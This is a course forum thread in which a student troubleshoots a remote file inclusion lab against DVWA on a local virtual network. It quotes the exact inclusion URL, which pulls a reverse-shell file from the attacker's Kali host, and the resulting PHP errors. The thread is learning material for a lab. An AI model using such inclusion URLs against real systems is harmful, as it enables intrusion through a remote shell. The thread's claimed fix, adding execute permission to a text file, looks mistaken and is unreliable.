- This topic has 5 replies, 3 voices, and was last updated 4 years, 7 months ago by Zaid Sabih.
- AuthorPosts
- April 30, 2020 at 11:09 pm #35452Tom HarrowParticipant
When I execute the URL to establish the reverse connection, no connection is made by netcat. DVWA is set to “low. I receive these two messages right below the URL bar:
“Warning: include(http:/10.0.2.6/reverse.txt) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35.
Warning: include() [function.include]: Failed opening ‘http:/10.0.2.6/reverse.txt’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear:../../external/phpids/0.6/lib/’) in /var/www/dvwa/vulnerabilities/fi/index.php on line 35”.
This is similar to errors I got with local file inclusion.Both Kali and Metasploitable are set to NatNetwork; Kali apache2 server is running. Phpini file edited to allow_url On. Thanks is advance.
May 1, 2020 at 9:03 am #35492Vashisht BoodhunParticipantCan you paste the exact url used there?
May 2, 2020 at 12:49 am #35576Tom HarrowParticipantVashisht,
This is the exact URL I used – http://10.0.2.7/dvwa/vulnerabilities/fi/?page=http:/10.0.2.6/reverse.txt
kali machine is on 10.0.2.6, with apach2 server started. dvwa is on 10.0.2.7. reverse.txt file is in /var/www/html directory. Dvwa set to “low” security. Thanks in advance for your help. Have not had any luck finding the solution searching the web.
May 2, 2020 at 12:31 pm #35601Vashisht BoodhunParticipantCan you try clearing the browsing history for the kali machine?
May 2, 2020 at 9:59 pm #35638Tom HarrowParticipantThat didn’t work, so I got to thinking about the php file. Since it had an extension of .txt, it probably couldn’t be executed without adding execution permissions. I did that and now it works. Thanks,
Tom
May 3, 2020 at 3:54 pm #35708Zaid SabihModeratorPerfect, glad you figured it out 🙂
- AuthorPosts
- You must be logged in to reply to this topic.